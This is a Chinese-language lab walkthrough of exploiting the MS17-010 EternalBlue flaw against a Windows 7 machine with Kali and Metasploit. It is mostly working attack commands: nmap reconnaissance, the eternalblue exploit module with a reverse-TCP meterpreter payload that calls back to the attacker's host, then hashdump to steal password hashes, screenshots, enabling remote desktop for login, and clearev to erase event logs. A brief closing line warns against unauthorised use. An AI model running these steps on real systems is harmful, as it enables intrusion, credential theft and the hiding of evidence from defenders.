系统漏洞入侵之(永恒之蓝)，

-----漏洞入侵
-----MS17-010 永恒之蓝 --勒索病毒
----利用MSF攻击框架
----用到meterPeter 渗透工具渗透

实验环境 ：
一台KALI
一台win 7
----MS17-010
利用445端口实行入侵
只有防火墙关闭才会成功

操作步骤

1，扫描主机开放端口情况

    nmap -sP 192.168.31.1-255  扫描在线主机
    nmap -sS 192.168.31.109    扫描端口开放情况
    nmap -O 192.168.31.109     扫描操作系统

2，扫描到端口开放，扫描到win7系统，利用漏洞开始攻击，

root@kali:~# msfconsole     //开启运行MSF攻击框架

msf > search dos            //查找KALI漏洞库

msf > search ms17-010      //查找MS17-010漏洞  ，并复制存放路径

msf > use exploit/windows/smb/ms17_010_eternalblue   //应用漏洞

set payload windows/x64/meterpreter/reverse_tcp     //设置反弹端口，让远程主机主动的连接此端口    
                
set rhost 192.168.31.153       //设置渗透的目标主机IP                      
set lhost 192.168.31.109      //设置本地的主机IP
exploit   //利用 

meterpreter > pwd   //进入到渗透视图 （进入了目标WIN7系统）                      
C:\Windows\system32
meterpreter

3，进入到win7系统执行一些恶意命令，开启远程实施图形化登陆，

meterpreter > mkdir jiayou  //创建文件夹
meterpreter > hashdump     //破解密码
meterpreter > screenshot  //屏幕截图

meterpreter > run getgui -e    //启动远程程序
新建终端 ：rdesktop  - u  tedu   -p   tedu   192.168.31.109:3389 //远程登陆

C:\Windows\system32>exit
meterpreter > clearev  //清除日志

友情提示：
真实环境中，请勿利用漏洞实施攻击，俗话说，kali玩的好，监狱进的早
任何未经授权的渗透，攻击测试，都是违法行为。